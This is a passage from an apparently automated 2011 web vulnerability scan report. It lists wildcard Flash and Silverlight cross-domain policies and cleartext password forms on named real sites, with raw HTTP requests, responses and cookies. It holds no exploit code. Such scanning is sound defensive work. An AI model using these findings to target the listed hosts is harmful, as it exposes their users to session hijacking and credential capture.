<allow-access-from domain="http://xmtenderinter.intra.camera.it" />
<allow-access-from domain="*.xmtenderinter.intra.camera.it" />
<allow-access-from domain="xmtenderinter.intra.camera.it" />
<allow-access-from domain="http://nuovo.intra.camera.it" />
<allow-access-from domain="*.nuovo.intra.camera.it" />
<allow-access-from domain="nuovo.intra.camera.it" />
...[SNIP]...

5.38. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 02 May 2011 22:33:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.39. https://www.eni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.eni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eni.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:43 GMT
Last-Modified: Fri, 12 Nov 2010 08:47:16 GMT
ETag: "2caf6-148-232eed00"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: application/xml
Set-Cookie: TS782077=2dff656feed00e0ad3df2bc60f4c0f7722f0b4bab3ec8bf54dbf447e; Path=/

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.eni.it" />
   <allow-access-from domain="*.eni.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eni.com" secure="true" />
...[SNIP]...

5.40. http://imagesdotcom.ilsole24ore.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesdotcom.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesdotcom.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:05 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Wed, 07 May 2008 05:43:55 GMT
Accept-Ranges: bytes
Content-Length: 133
Vary: Accept-Encoding,User-Agent
ETag: "10dc6c-85-44c9d734f5cc0"-gzip
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="ilsole24ore.com" to-ports="80" />
</cross-domain-policy>

5.41. http://job24.ilsole24ore.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://job24.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: job24.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:34 GMT
Server: Apache/2.0.46 (CentOS)
Last-Modified: Tue, 19 Feb 2008 14:13:10 GMT
ETag: "81ee02-82-78e86980"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="ilsole24ore.com" to-ports="80" />
</cross-domain-policy>

6. Silverlight cross-domain policy
There are 10 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 02 May 2011 22:45:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad78.neodatagroup.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad78.neodatagroup.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad78.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8985-145-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 325
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.3. http://adlev.neodatagroup.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adlev.neodatagroup.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: adlev.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:21:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8985-145-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 325
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:21:48 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.4. http://cdn1.eyewonder.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn1.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn1.eyewonder.com

Response

HTTP/1.0 200 OK
Content-Length: 261
Content-Type: text/xml
Last-Modified: Wed, 08 Oct 2008 19:49:12 GMT
Accept-Ranges: bytes
ETag: "12b0cf07e29c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Cache-Control: max-age=3559
Date: Mon, 02 May 2011 22:17:05 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true
...[SNIP]...

6.5. http://elstatic.weborama.fr/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://elstatic.weborama.fr
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: elstatic.weborama.fr

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Mon, 02 May 2011 23:05:02 GMT
ETag: "820671401"
Expires: Mon, 09 May 2011 23:05:02 GMT
Last-Modified: Wed, 12 May 2010 19:52:17 GMT
Server: ECAcc (dca/5370)
X-Cache: HIT
Content-Length: 298
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

6.6. http://ieo.solution.weborama.fr/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ieo.solution.weborama.fr

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 19:39:08 GMT
ETag: "68008-12a-4866acba3af00"
Accept-Ranges: bytes
Content-Length: 298
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

6.7. http://metrics.ilsole24ore.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:44 GMT
Server: Omniture DC/2.0.0
xserver: www12
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.8. http://omniture.virgilio.it/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniture.virgilio.it
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omniture.virgilio.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:17 GMT
Server: Omniture DC/2.0.0
xserver: www22
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.9. http://secure-it.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-it.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-it.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:43 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 22:17:43 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

6.10. http://api.bing.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Mon, 02 May 2011 22:23:14 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=20E8C6C83AEB492C83715B7C9D6D2BC0; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BCC05BE254104E4CA7552CD9C2BBFAF8; expires=Wed, 01-May-2013 22:23:14 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

7. Cleartext submission of password
There are 14 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://cp.mightyblue.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://cp.mightyblue.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HELM=Password=&Username=; ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:18 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&Username=&Password=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=KGAIJAJDPDPMGCEMADNKOION; path=/
ACCEPT-RANGES: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" align="center" width="100%">
<form name="frmLogon" action="default.asp" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="txtPassword" size="20" value="" class="textBox"></td>
...[SNIP]...

7.2. http://cp.mightyblue.com/default.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://cp.mightyblue.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

POST /default.asp HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
Referer: http://cp.mightyblue.com/
Cache-Control: max-age=0
Origin: http://cp.mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD; HELM=Interface=&NonSecureReturnURL=&Username=&Password=; ASPSESSIONIDCCBBBCAS=IGAIJAJDHCHPFKIAEPNMOKIO
Content-Length: 86

txtUsername=&txtPassword=&selLanguageCode=EN&selInterface=standard_XP&btnProcess=Logon

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5898
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:26 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&LanguageCode=EN&Password=&Username=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
ACCEPT-RANGES: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" align="center" width="100%">
<form name="frmLogon" action="default.asp" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="txtPassword" size="20" value="" class="textBox"></td>
...[SNIP]...

7.3. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 22:24:04 GMT; path=/; domain=digg.com
Set-Cookie: d=a6c9fed1b0af625d597fc8f28c424ca9628041e70e1e569b66b06472a71d7e23; expires=Sun, 02-May-2021 08:31:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=59942 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8170

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

7.4. http://du.ilsole24ore.com/utenti/Registrazione.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://du.ilsole24ore.com
Path:   /utenti/Registrazione.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /utenti/Registrazione.aspx HTTP/1.1
Host: du.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:07 GMT
Server: Microsoft-IIS/6.0
SERVER: PRODFE1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="Registrazione.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="form_text_box" id="password_input">
<input class="text_box" type="password" maxlength="20" id="password" name="password">
</div>
...[SNIP]...
<div class="form_text_box" id="passwordConfirm_text">
<input class="text_box" type="password" id="passwordConfirm" name="passwordConfirm" maxlength="20">
</div>
...[SNIP]...

7.5. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://du.ilsole24ore.com
Path:   /utenti/facebook_connect.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /utenti/facebook_connect.aspx HTTP/1.1
Host: du.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:07 GMT
Server: Microsoft-IIS/6.0
SERVER: PRODFE1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="facebook_connect.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle"><input type="password" name="txtPassword" id="txtPassword" class="text_box_sole" value="" style="color:#000"/></td>
...[SNIP]...

7.6. http://jsdotcom.ilsole24ore.com/js2010/common.min.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://jsdotcom.ilsole24ore.com
Path:   /js2010/common.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /js2010/common.min.js?v1.0003 HTTP/1.1
Host: jsdotcom.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cc=true; s_cm_NW=undefinedburpburp; s_nr=1304393096016-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:17 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Wed, 26 Jan 2011 10:59:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 22:30:17 GMT
Vary: Accept-Encoding,User-Agent
ETag: "2a3e0a-32d5-49abdbbbb59bd"-gzip
Content-Type: application/x-javascript
Content-Length: 13013


var DEF_RURL=document.location;var DEF_ERRURL='http://www.ilsole24ore.com/errore.shtml';var DEF_SITECODE='CO';var DEF_SUBSCRIBE_SCRIPT='http://du.ilsole24ore.com/DU/iniziaRegistrazione.aspx';var DEF_
...[SNIP]...
<div id="login-window">';content+='<form id="login-form" action="" method="post" name="authUser">';content+='<input value="" name="URL" type="hidden"/>
...[SNIP]...
<br /><input class="ie6_input" type="password" name="txtPassword" /></p>
...[SNIP]...

7.7. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://jsdotcom.ilsole24ore.com
Path:   /js2010/soleLib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /js2010/soleLib.js?v1.0032 HTTP/1.1
Host: jsdotcom.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Thu, 07 Apr 2011 13:00:09 GMT
Cache-Control: max-age=2592000
Expires: Sat, 28 May 2011 19:07:12 GMT
Vary: Accept-Encoding,User-Agent
ETag: "8f1c-10a57-4a053b0735be0"-gzip
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 22:13:48 GMT
X-Varnish: 373212939 294566969
Age: 356796
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 68183

// sole lib
/* COMMON anche singolo */
var DEF_RURL=document.location;var DEF_ERRURL='http://www.ilsole24ore.com/errore.shtml';var DEF_SITECODE='CO';var DEF_SUBSCRIBE_SCRIPT='http://du.ilsole24ore.com
...[SNIP]...
<div id="login-window">';content+='<form id="login-form" action="" method="post" name="authUser">';content+='<input value="" name="URL" type="hidden"/>
...[SNIP]...
<br /><input class="ie6_input" type="password" name="txtPassword" /></p>
...[SNIP]...

7.8. http://pf.rossoalice.alice.it/login.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://pf.rossoalice.alice.it
Path:   /login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login.html HTTP/1.1
Host: pf.rossoalice.alice.it
Proxy-Connection: keep-alive
Referer: http://mail.alice.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
